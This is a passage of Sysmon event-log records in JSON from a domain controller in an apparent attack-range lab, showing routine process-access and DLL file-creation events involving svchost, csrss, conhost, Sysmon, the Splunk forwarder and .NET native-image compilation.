05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7335,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7336,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:55.699\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-001065410D00}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:55.699","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-001065410D00}","TargetProcessId":"4416","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7337,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:56.856\r\nProcessGuid: {A837DB8D-049D-5F25-0000-0010188A0F00}\r\nProcessId: 3796\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ed4-0\\System.Activities.dll\r\nCreationUtcTime: 2020-08-01 05:58:56.856","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:56.856","ProcessGuid":"{A837DB8D-049D-5F25-0000-0010188A0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ed4-0\\System.Activities.dll","CreationUtcTime":"2020-08-01 05:58:56.856","EventReceivedTime":"2020-08-01 05:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7338,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:56.996\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A0-5F25-0000-001054970F00}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:56.996","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A0-5F25-0000-001054970F00}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7339,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:56.996\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A0-5F25-0000-001054970F00}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:56.996","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A0-5F25-0000-001054970F00}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7340,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:56.996\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A0-5F25-0000-001054970F00}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:56.996","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A0-5F25-0000-001054970F00}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7341,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:57.324\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A1-5F25-0000-00105B9C0F00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:57.324","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A1-5F25-0000-00105B9C0F00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7342,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:57.324\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A1-5F25-0000-00105B9C0F00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:57.324","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A1-5F25-0000-00105B9C0F00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7343,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:57.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A1-5F25-0000-00105B9C0F00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:57.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A1-5F25-0000-00105B9C0F00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
